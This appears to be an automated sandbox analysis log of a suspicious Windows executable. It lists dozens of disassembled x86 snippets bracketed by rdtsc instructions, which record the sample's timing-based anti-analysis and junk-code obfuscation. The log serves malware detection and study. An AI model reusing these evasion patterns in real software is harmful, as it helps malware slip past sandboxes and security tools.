                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B98906 second address: B98923 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF3D0F68BADh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B984FA second address: B98509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3D0D81736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BA76A0 second address: BA76A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BA76A5 second address: BA76CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81748h 0x00000009 jg 00007FF3D0D81736h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: AC2492 second address: AC2497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BAEEB3 second address: BAEEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BAF020 second address: BAF02B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FF3D0F68BA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BAF312 second address: BAF327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF3D0D81736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FF3D0D81736h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BAF327 second address: BAF32D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BAF59D second address: BAF5BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF3D0D8173Fh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB32B5 second address: BB32B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB32B9 second address: BB32D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF3D0D8173Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2DBD second address: BB2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF3D0F68BA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2DC7 second address: BB2DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2DCB second address: BB2DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2F6D second address: BB2F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2F71 second address: BB2F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BB2F75 second address: BB2F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BBD1BD second address: BBD1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BD3B38 second address: BD3B4E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0D8173Ch 0x00000008 jnp 00007FF3D0D8173Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BD3710 second address: BD371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BE9A40 second address: BE9A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEA4CA second address: BEA4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEA4CE second address: BEA500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D8173Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF3D0D8173Dh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FF3D0D8173Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEA500 second address: BEA506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BED2B3 second address: BED2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FF3D0D81738h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BED2C7 second address: BED2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BED2CB second address: BED2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEE837 second address: BEE83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEE83C second address: BEE84C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF3D0D81736h 0x0000000a jne 00007FF3D0D81736h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BEE84C second address: BEE850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BF02F6 second address: BF0322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FF3D0D8173Ch 0x00000011 pop ebx 0x00000012 jmp 00007FF3D0D8173Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BF0322 second address: BF0327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: BF0327 second address: BF032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B06A82 second address: B06A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: B06A88 second address: B06A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F041A second address: 49F0473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 3ADD68E8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov bh, ah 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 movsx edx, si 0x00000019 pushfd 0x0000001a jmp 00007FF3D0F68BAAh 0x0000001f xor cl, 00000048h 0x00000022 jmp 00007FF3D0F68BABh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007FF3D0F68BB6h 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 movsx ebx, ax 0x00000039 movzx esi, dx 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F0473 second address: 49F0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F0479 second address: 49F047D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F047D second address: 49F0481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F04AD second address: 49F04B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F04B1 second address: 49F04B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 49F04B5 second address: 49F04BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10731 second address: 4A1076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF3D0D8173Fh 0x00000008 pop ecx 0x00000009 jmp 00007FF3D0D81749h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, 43AEh 0x00000019 mov eax, ebx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A1076B second address: 4A10786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10786 second address: 4A1078A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A1078A second address: 4A10790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10790 second address: 4A107A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81742h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A107A6 second address: 4A10836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF3D0F68BB6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FF3D0F68BAEh 0x00000019 mov ch, 38h 0x0000001b popad 0x0000001c push esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF3D0F68BB8h 0x00000024 add ah, 00000048h 0x00000027 jmp 00007FF3D0F68BABh 0x0000002c popfd 0x0000002d call 00007FF3D0F68BB8h 0x00000032 mov esi, 40E34DC1h 0x00000037 pop eax 0x00000038 popad 0x00000039 mov dword ptr [esp], ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov di, E1D8h 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10836 second address: 4A10876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 jmp 00007FF3D0D81748h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 jmp 00007FF3D0D8173Eh 0x00000015 mov bl, ah 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, FBACh 0x00000020 movsx ebx, si 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10876 second address: 4A10898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10898 second address: 4A1089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A1089C second address: 4A108B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A108B7 second address: 4A10914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 pushfd 0x00000011 jmp 00007FF3D0D81749h 0x00000016 jmp 00007FF3D0D8173Bh 0x0000001b popfd 0x0000001c popad 0x0000001d nop 0x0000001e pushad 0x0000001f mov esi, 0E9467FBh 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10914 second address: 4A10918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10918 second address: 4A1092E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A1092E second address: 4A10955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF3D0F68BB5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10955 second address: 4A1095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A1095B second address: 4A1095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10A33 second address: 4A10A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF3D0D8173Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A10A61 second address: 4A001A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov eax, 68289243h 0x00000010 pushfd 0x00000011 jmp 00007FF3D0F68BB8h 0x00000016 and ah, 00000008h 0x00000019 jmp 00007FF3D0F68BABh 0x0000001e popfd 0x0000001f popad 0x00000020 leave 0x00000021 jmp 00007FF3D0F68BB6h 0x00000026 retn 0004h 0x00000029 nop 0x0000002a sub esp, 04h 0x0000002d xor ebx, ebx 0x0000002f cmp eax, 00000000h 0x00000032 je 00007FF3D0F68D0Ah 0x00000038 mov dword ptr [esp], 0000000Dh 0x0000003f call 00007FF3D5034EE3h 0x00000044 mov edi, edi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A001A9 second address: 4A001AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A001AD second address: 4A0020F instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FF3D0F68BAEh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 mov bx, F0F0h 0x00000018 movsx ebx, ax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov edi, ecx 0x00000021 pushfd 0x00000022 jmp 00007FF3D0F68BAAh 0x00000027 and eax, 427BE938h 0x0000002d jmp 00007FF3D0F68BABh 0x00000032 popfd 0x00000033 popad 0x00000034 sub esp, 2Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF3D0F68BB5h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A0020F second address: 4A00215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A00215 second address: 4A00219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A003C4 second address: 4A003CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A003CA second address: 4A003CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A003CE second address: 4A00453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c jmp 00007FF3D0D8173Eh 0x00000011 test al, al 0x00000013 pushad 0x00000014 mov bx, cx 0x00000017 call 00007FF3D0D8173Ah 0x0000001c pushfd 0x0000001d jmp 00007FF3D0D81742h 0x00000022 and cl, FFFFFFA8h 0x00000025 jmp 00007FF3D0D8173Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d je 00007FF3D0D818F7h 0x00000033 jmp 00007FF3D0D8173Fh 0x00000038 lea ecx, dword ptr [ebp-14h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF3D0D81745h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A004FA second address: 4A00527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF3D0F68BADh 0x00000013 pop eax 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A00527 second address: 4A0052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A0052C second address: 4A00568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007FF441956AFFh 0x0000000d jmp 00007FF3D0F68BB0h 0x00000012 js 00007FF3D0F68C42h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3D0F68BB7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A00568 second address: 4A005CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 16FAh 0x00000007 pushfd 0x00000008 jmp 00007FF3D0D8173Bh 0x0000000d or eax, 07680A9Eh 0x00000013 jmp 00007FF3D0D81749h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c cmp dword ptr [ebp-14h], edi 0x0000001f jmp 00007FF3D0D8173Eh 0x00000024 jne 00007FF44176F622h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF3D0D81747h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exe RDTSC instruction interceptor: First address: 4A005CE second address: 4A0060C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov cl, B1h 0x0000000f call 00007FF3D0F68BB9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0060C second address: 4A0062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 lea eax, dword ptr [ebp-2Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81748h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0062F second address: 4A00634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00634 second address: 4A006F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF3D0D81742h 0x00000012 sbb esi, 7C060548h 0x00000018 jmp 00007FF3D0D8173Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF3D0D81748h 0x00000024 sbb si, C7A8h 0x00000029 jmp 00007FF3D0D8173Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dx, si 0x00000033 popad 0x00000034 mov dword ptr [esp], esi 0x00000037 jmp 00007FF3D0D81742h 0x0000003c nop 0x0000003d jmp 00007FF3D0D81740h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov al, 95h 0x00000048 pushfd 0x00000049 jmp 00007FF3D0D81749h 0x0000004e and eax, 19C38BD6h 0x00000054 jmp 00007FF3D0D81741h 0x00000059 popfd 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A006F3 second address: 4A00703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00703 second address: 4A00707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00707 second address: 4A00760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF3D0F68BADh 0x00000010 sub ah, FFFFFFE6h 0x00000013 jmp 00007FF3D0F68BB1h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FF3D0F68BAAh 0x00000020 push eax 0x00000021 jmp 00007FF3D0F68BABh 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007FF3D0F68BABh 0x0000002f pop ecx 0x00000030 mov cx, di 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00772 second address: 4A00778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
